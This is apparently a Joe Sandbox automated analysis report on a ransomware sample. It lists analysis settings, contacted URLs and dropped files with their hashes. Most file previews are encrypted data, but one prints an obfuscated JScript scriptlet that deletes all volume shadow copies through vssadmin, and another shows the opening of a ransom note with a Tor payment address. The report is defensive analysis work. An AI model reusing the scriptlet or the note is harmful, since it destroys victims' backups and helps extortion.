                                                                                            • URL Reputation: safe
                                                                                            low
                                                                                            https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1:taskhostw.exe, 0000001E.00000002.494889453.00000255F5824000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              https://xsts.auth.xboxlive.com/svchost.exe, 00000004.00000000.235585285.000002484407F000.00000004.00000001.sdmpfalse
                                                                                                high

                                                                                                Contacted IPs

                                                                                                No contacted IP infos

                                                                                                General Information

                                                                                                Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                Analysis ID:419877
                                                                                                Start date:21.05.2021
                                                                                                Start time:19:14:24
                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                Overall analysis duration:0h 8m 42s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:light
                                                                                                Sample file name:7906dc47_by_Libranalysis (renamed file extension from none to exe)
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                Number of analysed new started processes analysed:36
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:4
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • HDC enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Analysis stop reason:Timeout
                                                                                                Detection:MAL
                                                                                                Classification:mal100.rans.evad.winEXE@57/122@0/0
                                                                                                EGA Information:Failed
                                                                                                HDC Information:
                                                                                                • Successful, ratio: 71.7% (good quality ratio 24.2%)
                                                                                                • Quality average: 15.2%
                                                                                                • Quality standard deviation: 25.1%
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 98%
                                                                                                • Number of executed functions: 0
                                                                                                • Number of non-executed functions: 0
                                                                                                Cookbook Comments:
                                                                                                • Adjust boot time
                                                                                                • Enable AMSI
                                                                                                Warnings:
                                                                                                Show All
                                                                                                • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe
                                                                                                • Created / dropped Files have been reduced to 100
                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                Simulations

                                                                                                Behavior and APIs

                                                                                                TimeTypeDescription
                                                                                                19:15:18API Interceptor6x Sleep call for process: WMIC.exe modified

                                                                                                Joe Sandbox View / Context

                                                                                                IPs

                                                                                                No context

                                                                                                Domains

                                                                                                No context

                                                                                                ASN

                                                                                                No context

                                                                                                JA3 Fingerprints

                                                                                                No context

                                                                                                Dropped Files

                                                                                                No context

                                                                                                Created / dropped Files

                                                                                                C:\Users\Public\readme.txt
                                                                                                Process:C:\Windows\System32\taskhostw.exe
                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                Category:modified
                                                                                                Size (bytes):332
                                                                                                Entropy (8bit):5.034923816487289
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:RlSJMvj2FvP+GGJ7vzYdEwjk61CNHY/BWcAMHoq8x/1pm49NVOH:RlbrRb0knY/BWP31pm49/s
                                                                                                MD5:718777534403CDCF89B5D9B5F4B2F141
                                                                                                SHA1:3F49F57F3C25D60FEF6D5593C9EB5A69B74A7B29
                                                                                                SHA-256:619DE8A85D1BEAC2E0B2C9CEF08F56FC70859F6F4DD0F763D2175BDAC746B0CB
                                                                                                SHA-512:8018FDBEC663355DB212827869EB7744F615F58DB96E9A12DA248F40979D28D8057BCAB945381E43CB346E0B3DED14743EFD8B47727CA98E32E430B6519D7440
                                                                                                Malicious:true
                                                                                                Preview: <?XML version="1.0"?><scriptlet><registration progid="Pentest" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"><script language="JScript"><![CDATA[var r = new ActiveXObject("W"+"Scr"+"ipt.S"+"he"+"ll").Run("vs"+"s"+"admi"+"n.e"+"x"+"e De"+"le"+"t"+"e S"+"ha"+"do"+"ws /a"+"ll /qu"+"ie"+"t"); </script></registration></scriptlet>.
                                                                                                C:\Users\user\Desktop\EFOYFBOLXA.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.852540487523584
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:qkVevOZPioUIS4cSoGrAej3P/z63aa8rO3GzkiOdD28SKCO0+xB8ZaaJpSjtduq:twvOZPvUIS4cSTrnLD6qawz5OdD8DO1d
                                                                                                MD5:4CA8C9464132BD46B0F34405CA7DBE2B
                                                                                                SHA1:64947AE9858AF884986FECE9B73B8258AD80A8F3
                                                                                                SHA-256:100D4A3CBE30A8CF7F661969551DE09971577017D6880175ACE2D2BA8BB9F7BF
                                                                                                SHA-512:E16FF7FD47974F29695D2DC2BFC9E2DB1568879F70B19ACEE1BD5F0280A817BDEC77280F89A998CF3674EB44CAF107034210A910A08FDB7B9219409829FDD58C
                                                                                                Malicious:false
                                                                                                Preview: .`...^..&....~n.p.....,.v....4yh.. w....@....9HG..n..S...y/R~.%.j....O..H...Y....Ic....]...2.}...3{:....'9...'Zl..).?.w...H4Z.Z.-.>.C ..$.7R\......Ri<..X.Z[%a..h./.b5NS...:.f.v...E..M`..E.=;M...)3A......5[@%.3..=Z{.s......./.m/0...M.(.+"....u...4....r..3..[......}......4l./}{WDNv.7i..J#.7..G?.)...w......m.....w%...u....:.@....@t'....$....[.<..N.]....Y...*......d..Z5.?.k..p`...;.F.....>.....;.2x5_..d..3 nn....3..t,..C.."..5....c...u.P.-.;.....2.r....2.p4.S..3k...t...p.v99.F..'..5...4.R.d|..,{.....%.Z..x.M$7VT.du....z%..oyP..f..LNO...v...._ac..6.:e........tY...D....../.{.z.(..z.......%..1....q...D...........V[x........$....6e.[.......TDS.`....0..>k...5~.n...........1......I^.9eD...r....ej...U.>+.....s.........i...n}...n...6.RO..TDY......&.`.'EC].#.N..9.jQ../W..I.[Y..N...Qj].(}<.Q..^..V.....c......N.....v64........s......'..>t...8.&s..Q...?H8N`.E..aL...,..}....q..P....!....jR..8.Q.....d..{u.].)].d.P..Iy].xWQ.....*.5G.,.
                                                                                                C:\Users\user\Desktop\EOWRVPQCCS.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.844261606143202
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:oe+60tGOx1aY4e835iW3z09UguJsh3QutwFMV8ZuN/bB9M1HY3FKo:BaV1aY4euAsY9UgOsh37t+9Zuz9M1HY3
                                                                                                MD5:03A68398A3D8E57984C8ED119F0B02B0
                                                                                                SHA1:2197AA2125FBFC2A6D091791088354690FAD35BF
                                                                                                SHA-256:52F566493197EEB8446F9847613B281C2B588A1274EB241A9D64B017BF417527
                                                                                                SHA-512:FD1A883459E2758EF2875082D7A9CA8DA476A5D7F64A59B153A78F88E4B05A51D1C0F218D0F072C3411BF57B4FF9AC13A2CD2CE04DB66C86680AF78B32FE78C3
                                                                                                Malicious:false
                                                                                                Preview: /...G7.Pk.+Fl..>.p+... .....QyHQ. :(...o..a...3.4...,U...J..].&......[ZT......~m@Tt.n.G.'.@.......8)oA.._..f}...IH...{...d0....H.T.L.y"9....l...E.{bR.......V........gR4wa<..n..v.g)./)..1..^..~f....5.Zg.{.a...I.......<....c.........E.`..[mp..?C.H./...z.sF.../.2."...l.4...<.W........x..z-...5H.V........)....Be5]..y;....jo.o....!..P..I..\WP..r+C2..pj..y.+.............2S...5.o..<~.Ph.xh..VEG..4j..18g..G..^.I_...%.$}%...zc.c..s.A@..d$.N.....J..{.F.<.n.hT......ej..C5..&:...p.m....<.@...C..#.I.s.4....Y.~m!.O.Ku....i..W.7.c......QV.m.D..P..;.C%..##>..8dX|_...."-.^...^[t....G'....._..H0.:I..Y.V|.M...y.7.........*lI..(O[.2..yS.." ..F,.k.>.2...CN.......J.%.8K....l.h#.WA..3..(,....#IB,H..........b.Kd.qc..~..)..o.F...].#.Z..;o..a_.QY.q.B.69.....|.,..Q..X......f....E<n.....kY.\5Q.K4..M..s.W..C.....KTG5s.{.~....kd2h.|...S...q#.....a......#.}P._..A..r..$....k.4.m..o.6.%2.$?R..XlxO..[H.m.....[.....%.dxO..3.v.n....Z5m....".Xnn.c...O.H./Iv..6.....ms;\.....
                                                                                                C:\Users\user\Desktop\GAOBCVIQIJ.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.865439143350547
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:EKARLrjmnrHEsjw51wc7Ze+ffas7HbKy3Rf3x0YEd6SntlsiBveeu5rBw1cIyF:EKARLrSrA19e0faSHbh313xPE3t5et5j
                                                                                                MD5:3BC5AAC0E7EC6B8C55AB923884AFAE07
                                                                                                SHA1:04AEDBAE33AB4712458D2B7B051C7D936E7C7C67
                                                                                                SHA-256:5DD70A325B3857CC2FB06E7215F0D0526ED1FF463D99A9020ED316C952C48CEE
                                                                                                SHA-512:1C183B017C9F863A98FD8A1FA25B69C4DED837E34B87C649D82A9B613E85F173F98DD16E5C775987200116DBA50E914C19D18677883F360F9802C2569A8A1EBD
                                                                                                Malicious:false
                                                                                                Preview: .C@.....D'."=..6.>..goy.5.J).U..XS.......P.T...\o...2...O.%..J@....?....Zad.B".H...n..].q.\.\.Q*.).)......J.h./....$.0...Z.8.....,.4.C7...."A.Y..SZ..;R.r_we...[....t*....A;.C...Y.>.7....<@p.j.o.K...u6.i.?lY...k\4../..._..A.....d).....E.-..;....;..:H.GH;..y...J.<ll".+p....nFGa.0.?...X...6S..r.Dxg..~.h'.*..[..........[..Y..i...4..=A.....f.~ ..kF.8..\..r..5o./.c....K............2_)...|..q.{T....8.m.:...j.6..QY.w.....;O.....'9H+.+...%..Y......./.w$-&dE.*.N.'...9i.P.|...u.5....fo`/..;.E.?.......A<....RFwO........C.b...>..K.:v.Pz.=.D..Y..N...%kx.../^%.&...V..4..:..x...{....}S.1 .e...>.......I..QD6.R......D%.V......y.>.k$*.....M`aT1.fu..T......W.?.=.>.X..i.a.i.i.)q...A~.Q........v...iC5;@.hHI....!l...:..I......0.<..2.ZA....DT...?:..$...I.P..!..e.l.|EB5u\C..:.T.Y...:6..Z..-.'.!%mh..(0i.0....L1..{....m..R...xFt.......i\..*U.[.....!...3C..3..mH..E5*.J.?v....P7ay. .B....>.PZ..?%.oK..A.`R7.p..t.....f.....L..$(K..B....b..@4....V....u..c..B...F.F
                                                                                                C:\Users\user\Desktop\GAOBCVIQIJ\BJZFPPWAPT.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.848359051937894
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:yWqJgc7r3MsWixduMVCWcHDnzpIpMbbMVri6mNwopwmPPfqrqSWTwdEJ8y+M0OrH:yOk3pxnVCWo1IabbGrifBpTPqrdW8dl8
                                                                                                MD5:8FE121D13E294A65A44DBF601F06798F
                                                                                                SHA1:0314A6286895BD2FC752192117A7DF6BF3D36657
                                                                                                SHA-256:F3422DDC6466F0217229023ADAFD9CB29D44E01DEAF30A1AB9D7D3ED7E15AFBB
                                                                                                SHA-512:3093D2544F9F21FB710FCCA7DB1FE7C3D7C884FBCA42AC80F9A1D72ACE7C0156C986C5C4BE2F4402D1995D201AF618C12A138564F3D9E3C5A0AD3AF8D9CA46B2
                                                                                                Malicious:false
                                                                                                Preview: <;.....W..2p.Zrm;].U.".+.s7....w..{.Qy..6..aX.Q....#.&[!w...m.4...~_.Z..k`(1f....$b.#n7..k...........W.f.oP..........I.F..5'.....b.T...."..-.<.iZ...qN..H.8..^SX.T..R.@K.}.%..TP~m.i.h?..|.......S.......q2....s..n.[...03.t.&...R..,.I...t8....4~o..!.}.O.*j..W..../T...c....K/@.I..i.T.<.Kw...e.f(..H..*.....;.o.W...)....~.3.C.q.'5...?.N.QA2.V>M..jT.$. W.....k......t...."!.......{...r..N..0......T.G)h|dNr.".'........@.......?&.mS..?.&.~Bc.u.3.C...E....[..("(..VI.t.L....b..\G.E0..................Np.}..F".{.=.%./#a..3.g.....j)+......K...tU"b......... j..f.z...W..A.$.].{uq.....o..g...G.8.....$...."..t.).I1..`.n-....W%Z.....^T.N?.m#93..<.w./L[..,=.......{.Z..xG.N&...O.%.d.m+'....kQ8.(.5PHI..{...~."...H......`2q.u.o..t.2}y...OD.Z..e.".....|....q....l...$.$..`..jdIy*..wn..5.(..R..X...<..q..H..2.9.....j.....1......1.S.A3...Kc...FA.U.n.$......Gyk`O~..7..... e..[EfA.<..V...?,0....*.lL3o:.kaI..iO..*.4z.E.b.(.G..@..2..B....i2.....F..G...`.....=.
                                                                                                C:\Users\user\Desktop\GAOBCVIQIJ\EEGWXUHVUG.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.853037717976314
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:xLo2GU7pvIxZkUm54UJjX3ZHsMXgbF1n+40cB+CdXP1oZUGKegC3:pH7pvIxaUmyu5sTbTn8CBiWGKK3
                                                                                                MD5:47B15681D80DF13F853FB10AF1A516EF
                                                                                                SHA1:F8B2637CD891AB9BB3EF29E447BE19C879B91575
                                                                                                SHA-256:CB829ABBA7D7E62310193E63948C2B5C4D4C0C833559FF62D2F77A6455A5F79D
                                                                                                SHA-512:04EF64BF1920FA22B7D7E8741DBC8E1DC4CC9A99FDDD64C42DD8BF926B9177F65CD92D3DBC96D1DBD2191A1FBA8B14E24B659D6FB4F44EE1616CA4CBE3521236
                                                                                                Malicious:false
                                                                                                Preview: ....O".$C7......W..ka...Q......J....UW..;y.U..b.........W.....E.1.6*t'..@..D...W...qcnC..W..D..<I....5P..i...iW....N$..3.....3...pK.Mk}....Cj.M.Z)..c{...=........l.O .! V..k.....W...n..?....s....3.X.$2&....w,T...A^......`..G...c..f...r. .3/.--...b#.|.....y........[..%...q).n*.p.f.n....".Q.b*...Lx3.....4).)...)......... ..a......^.q+.j-.1..Sv.~..L75J2..&..'.. .s......... ...4....4..F...`...D.9..N..ar:ukI..qL".;.Pa.K...kiP.}q...*f.Y'k..).`....o..j{...8/.......p...X...pRf.".x..z...+h..'.[&.2.g.([..!K...4-[..._...S..0anG...Z.... ..K....,...J....c..=.4,..#c.IAL..q\.:N.RR.d.,.3,.........'.K....<D...Xe..R.M.K......"...3L.X}..-@.:..G.V}...T..BH....0.S..[..=..e*v....tJNk.k.......X......5r...cz..q@.<|..8l9.#.HJ..#.......).vh..D./....8. O....+U..},...Wxxao47)..5>3..a3..B.%...me..v'..<hU ....z..`x.ed...k]5..%....Ue.....L.].>.].(.C.A...;..H..u{-.._.A..8_.)....[....HwV.............-.1...Kv.D...?.p..M...T.C......P......z".....j.A}.;....b.H..3...
                                                                                                C:\Users\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.846258676837589
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:I9wx8zAAEdnldhoiHtqZ0pIvj3IKTiA7wQYff+xTVHIs5+gxIX:se5ZhTIZ0pQlX3Af+L8dX
                                                                                                MD5:4ED6F7C1D874D0870752E38C4776B3F5
                                                                                                SHA1:9291DFFAF5EFA797DE2E926C192F8303417D4CCB
                                                                                                SHA-256:67E1ACB52C374DBA34003BC35390E4097E0F1EAEC7A0255CF4BD0B016C0BC029
                                                                                                SHA-512:F7B7AEE210255254E38E6172DD52F311025EB7017609585CF1B7A3CCC325A643B398E16084DBDC000B8906C1D0C0113D77036D4882D24B384260430BA139C400
                                                                                                Malicious:true
                                                                                                Preview: B.p...$...:.! {S......o!<....|......,..d...d;x.s]......Rj.i[P...2u.0...f.....^.I..?k.....:........j.K.a)Cj.".6t...K.....1X...z+5Y.+./.....e..D1...Z>..3k=.jp.P..F&Wu..Ma`.S.M.pM.R"?."..-%.g6.......|.xp.zhf0......9,X!..3..B..f.Nj(.N=.h../..l..U.Tr..?..B.0.2.hB.r^..2p.,..a....YYh.D...t..I}...A....."....z..#\nXGu.....$.._Z......z(..w....$.....k..r...[..c3...<..>.h..\.9S.. ......%.....e.....K..>P.....q.G..t.}..h...T5..u..jSY..lYjF..:7S....l.\."..x!.Q.....[.|f.*.ad<..#./.-.........T.....4...vMFj..$..MdR. .........#.7.#.Z.....f~k..d.Z......Uk.$......Y..X.1.......1.IS...O..@4..nf......j....L..W.gr6@5.0Lj..%.H....6._..........4"......7.N.....m.........-.a..exs...DZ.._..t{8..dX<\.+._.)..MN.!".....7...hWq.V...<..!...sl1.B?..<....._-.b....=.K6.&,..Y...j..&.<r.?mr...]....._...*..$G.....K6y...5;l)..puh.B..0.{...L..`...O.fq;pd..aB...D.Z..ZQa..(.. (C...wB.e...l..5.R..D.a.Gi...Ng.Q49.U.|.c:..)Ux.%M."..I.f.Z.rNqt..tKY}..u.D.C3...#D.5sV/.c[.....=R.H
                                                                                                C:\Users\user\Desktop\GAOBCVIQIJ\SUAVTZKNFL.xlsx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.849225361374033
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:8MAguY3lD46O4RHb6M9EcuXdH1frzgUZlPuylCBuXcTPa3a20:8jfYVM6Db6M9qLvPVfXcTPaq20
                                                                                                MD5:907738AE77E1AAED2BC9CF52D2D8D4A2
                                                                                                SHA1:7012B3B50CA2EF5F98CF5021CC0DB734655A9081
                                                                                                SHA-256:FB84A5AE9E599E4A2DC556581FC5896054DC158F3872CB04F3A82F52EC8F9369
                                                                                                SHA-512:2DDAE9037671F3C558DD7A09B3005383B0B9D76DFFB7FC0F376C69D83B538968AB9051DC6D5C49351A138AE70E1842ABB77E43B58E8F77F99D70FAC72AAAE9F9
                                                                                                Malicious:false
                                                                                                Preview: f.R"i>.......S..-..X.D...~..{......0]y..5..#.X.S..,).p.$..C....!...5v.:M$...}..>].......ES....\VNmE.J.C........S.........+N...*..o{.n.5F...B..mAiE..0...r..b.'"[.&O.-.c..E4..h....\L1.~.n....J.....9.ro...N.O}.76....@Or...[..}..*.=..~.%UL.....b..u.\*....t....WwG......~...Rk.S].{..DP.rV...#0}.\.A.....h..DE.nL$.&....Z.T..Z.=.X..E..V...&...)1.j..{.3$.".......Z.b.5q]..Nt......E."......&........e.{k.}.....g.{.o....@.M=h8g.>..]=]2...%7..."3...[.y(K....E.f.....p...HD.h4#g.jt..Q..7_..Q._...........b.n..vN..<.9B.h.F..c...-....Y.V'.8..}.v.?...E.....$<..P....cKa8.KE.#;@W..=.....kL\Y.Q.+Y.&.|....\.........&..N..d^....)i....F.E.Cy..w.....9&.H$S...)5........!#....*.m,...@h...;.Y.....s..)...&...?J.F4:r01R^...&.c...R*...Q.7.d~ #.?.a.....y.....P*. .e!.....+....M.......B_h..lUC.*!.......TK.8.e_.|.........w......E.+..Xi8|...6xh@M..R.d.....=I.X..K..i<e..e....p.Dv...t.2...a.6..g....w.P2.....8.%...K./....4..8..Z....bnPH........2.+.4k.E..B...QXd4q.......s...9.`.._l(.
                                                                                                C:\Users\user\Desktop\GAOBCVIQIJ\ZGGKNSUKOP.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.8562989223565785
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FnLTW1h6A3jlMt05FAy91dHVqHBDJ5Kbct1Hb577aSyoR/ekTaECPuHt:FnLS1h6oZ1ds0bwb577aSyyRaE+Yt
                                                                                                MD5:E8F04DC6FD43FD4B70D8CC1675EA8EA3
                                                                                                SHA1:EE3FAFC52DE29D5BB4F8398C575B69652E8C0D79
                                                                                                SHA-256:0A0E9C9E3CFFB856ED9EDB6F4873702113FC381C445DF0217CA5CD2C32878AC7
                                                                                                SHA-512:D81E7522C65CC388587A51C7737F2E45D781AD01C92D0CA8AEE48BD51B29EADFF2C211533A903A26EAD8CD055F2B83E136A2E195DAB2C13A8D78CE6D714518FC
                                                                                                Malicious:false
                                                                                                Preview: MJ..7a.....:U..K...$.fa..#.....Y}....hT][.K....-.]....p.?wgrg....f..+..|/P.A.@...i...,.....qWha.'aM..L...:...`@..-..B.8......p._L..M.TI&.1.++.... .(.%}...2....0...R.&..7.......,.....BRp.K".,z.80P.?.P...C.~R.u..i.h.Z..l.m.^.....3|.b...B.]..T..M.^n^?..H.R8..UM.{.y.....z...:L.........P.Xt,t.x.....02-xp.."....kg"Y....V......a.]:...:.i..[..".D...a. ..'.R.'..$G=...D.R.0bL]....w.....Y.8.X..5.....#..t|.....0...O....I..^$?...p.~.)..2..S.,..RJ....zh....2.x.#..D.S.,.!<.;Ho]....s.S..B(..2sW.....{....R...s..C.HG.e.....F{.p...,.h.K...Z..*]..Y....%.G..D..~.J.......$.984GS..._:W......k...0.u=./.....|.U.Pz.#Q...=.........WU37...y.4l.XD.........&...<`..`.d.=3m......B. .p{1~..Q..mB.....if|...C#.s."8..hg.JL.b..r.>.G>.q.|...aN...(..?JG...2.....[/..<n...S."k..".?..BV..s5..=...x..K...6.Q./.<.D0..<z...O.od....-. ...C.m"O.f.x....^..is.?.....p.I..@-.e...l`:.j5..'...*.G<u."j.e.N....?...a^.c'...s|..k.U.z......Ey....Jj..qng..3u........S...N.-".jsp......lV. D..9.j..`.$.\u"b
                                                                                                C:\Users\user\Desktop\GAOBCVIQIJ\readme.txt
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):3004
                                                                                                Entropy (8bit):4.834891694847581
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:eUimvpiIXMwOH+QMHw0dHrHeH+lgE0UimvpiIXMwOH+QMHw0dHrHeH+lgEV:erWxnOEbL+AsrWxnOEbL+At
                                                                                                MD5:62318A9E589ED3CE4D5AED91188DB708
                                                                                                SHA1:1C51B8F63FB9DD87C9BBF9714B03D082BBABEDF8
                                                                                                SHA-256:E7AE9C658A09C776DCA83794E0FD41DD2E8E0CB888626BDF07650E564B4585FA
                                                                                                SHA-512:5BA95687AF6C750F0DD91825B9F72AABC17B17226FB6FEB7E5AB98DD4F1028C763C4BA72CA0A102F6AC33C8925FB1B2EEEABA5C0E25D3B848B0AF0F2681B02AB
                                                                                                Malicious:false
                                                                                                Preview: ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!.. ====================================================================================================.. Your files are NOT damaged! Your files are modified only. This modification is reversible..... The only 1 way to decrypt your files is to receive the private key and decryption program..... Any attempts to restore your files with the third party software will be fatal for your files!.. ====================================================================================================.. To receive the private key and decryption program follow the instructions below:.... 1. Download "Tor Browser" from https://www.torproject.org/ and install it..... 2. In the "Tor Browser" open your personal page here:...... http://aec850e8ac806e10a87438b00eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj...... Note! This page is available via "Tor Browser" only... =============================================================
                                                                                                C:\Users\user\Desktop\GRXZDKKVDB.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.8536323168868485
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:62Fl+wXFYaAEjqSwGpcxY8hxp1WIJA4RsSw0g4F+os/2f6yOay8dnY2VUVCs/JAl:62P+x/E+SpQvp1WIJ/42f6yqyndUVhBY
                                                                                                MD5:5C15A9F8D1923DF59A46DF69778D51E1
                                                                                                SHA1:E6F3BDD5455F724523D63650C3D5E5065901061E
                                                                                                SHA-256:29CB9AF9ECF6B70573E59DE70CD3868FDC2F71F0BA97B38C4A17BA26FCFB561F
                                                                                                SHA-512:2F1D19F7FE5B99F5AC590F141AEBAE952744961B36A4E78CE313300C94A9885D191690382E610F6A7B13343CC1D1FBAFAA130B1396BD15A6EC4AC10F13FC58A0
                                                                                                Malicious:false
                                                                                                Preview: .....z.m......3.....-.).g.$.~....,.^t..o\..L..ia.8.....l.l.v]r.X.........1...!...(...Fb...@.....S.v.Qh....pVo..^b.Xr"?.G.....ty.......dm.....hf.5~.....W..r..X.?.Qq.#..x......I...O|...R..E...N.^.....s..N.-.H%....y.'.....?....aT........V..&t.Wid...1a.S.J.4$p.;...p..%.IJS.1...#zf......W...^.6.*...r....O...*.'...p..'..l.........O...~=..L..H..b.W./........'..r{.zW.K.R..g]..k.i.7-.....Ji...;....0..M."..w....\.h~...Q.&..r.Y....t..Pry.J.k.L9=.....b.!a...Q..W..]..LN1...Ll.4.,I.D7...:..P...tM"....._.|dYK.&....D?.1..5..o.\.ys....U.../...&.va.~..b..|.&..r?..q.uU.>P..... 3...%...8a.J..w2Ij...x..N2...5.z.......6%Q..K:t.l_...-sr.HH.M;..z.......~..........`...PMu.p..Y._.w..P@)w...0~.\..{..5V...|\.U.q.YP.zAB..2..$.D..N......S.]..a......)...G...&.oOyc.l.s).=..?.....|....o@.....N...5..o).4.L.;...[......_xl7..#..2..>..Co<9.O.ZG6.-P...g......._t%au..e.i.S.:."-az..^.*...IZ.Pv..6.a..tq..h.....S.j.%.4.pk.}.L..xQ'..C0....=..p....C..t..J.`.sqL...=^8...I.W~..2.z..
                                                                                                C:\Users\user\Desktop\IPKGELNTQY.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.8313474040184
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:uN3sLMfy4DR2RvFCYtWXH0lehJFt9xI7cuxPfQ3wT5keE9dC1nw:UOIYYXUleJJxg5Q3wT2eqd3
                                                                                                MD5:33B2A8B97E4964407273674D02DA07E4
                                                                                                SHA1:DB9472D0AF3513940B15B54E71959757B858B3F6
                                                                                                SHA-256:8BBDF00D60F9017A4D6111FEB3B8DF0EA9B739BDBDDF250CDDD40306EE42FD6C
                                                                                                SHA-512:C056D77745B5CC05D62C984C75FDD1262B64555F65CA6AB9237DF986C065AD71BFEAD9E92568B7215E932CA995199DDAAEFC8CE7C7A423438BA0F1A9A61D1FA6
                                                                                                Malicious:false
                                                                                                Preview: .^.]\,.1Z.l..f...i.$..w7....&..?.y...[3.yv...4%~.D0..............}.#...qm.jN....l...H..|e..;Z.&..K.gg...awz.......f.......L.l%..`$../|.GW1...:....8a....p...R..S...7G.'.&.Os..d.......>..G..p....b........'...e.R...Uq....e.N..S.Z.%.A...$C.M!.._...\t1.&J.6..).N(..7...\N_mKr.B.I..T.:.....}K.G..x.M..j........!Cg0.....6.s...X.._..1......UR..?..R.z.5..".}...dt.s.OH...P.* Iq.[.....zI.......i...{....R.Z:.o...ti...}&...q.....\~_HV..i.o..........S}....4..WVD{sf..j..........b.m..}...Bj...............D2.Eh.)..4..!).%.S.....ags.wAG..[.Q.11T.K..9.9.V>#.y..U...b&.8....W....3..x;.....V.....VvL$....u'..D.+..>.~..a%..l5.............gn..1..LeIz.'E.T..P.>.Ra..]7.%n...i(5.c.^q.|..L.WJ.".z..N+...G...z9.|.N.Uf...AI.B"#.0..]....#..m3.axu..!..H.V.s..&..==........h..%....4t_......@.{~9N..w...t.G.R3.|..._.J;....s.l....k...-.GN..<....8.p.....s..!....@..C.Q..l....U............;..ac..O<...2.2..t. $.b.....@......T..0'i.<.6iW....y.....$\j.m.{..2l-1.].......}......_.
                                                                                                C:\Users\user\Desktop\IPKGELNTQY\GAOBCVIQIJ.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.847448517754549
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:67NZ/4L3JFrRVu811F3cDjcPj4zhHlvY685vagl734wfx5VtHzK2XX3DNysADN:Av4LzrRAc9oc8llvXGT9f3LHzHHcLN
                                                                                                MD5:4B9E9B0A640196E0AE44F3EE0B63EE04
                                                                                                SHA1:1593B7E5D4FA23827BB1D7CEA826B3158FEE943B
                                                                                                SHA-256:B50B586E0A50C4CB252DE4E955319C62C5CCB6427775E716463A6D732DD683D7
                                                                                                SHA-512:D6CA865F534C2E79CAC928741907B092D5835579FD8BC6160ED33D86E722034AD1F26E0935889EB55A9B4DC2901F040FCEE72B69710049580FBC2FDABA812D8A
                                                                                                Malicious:false
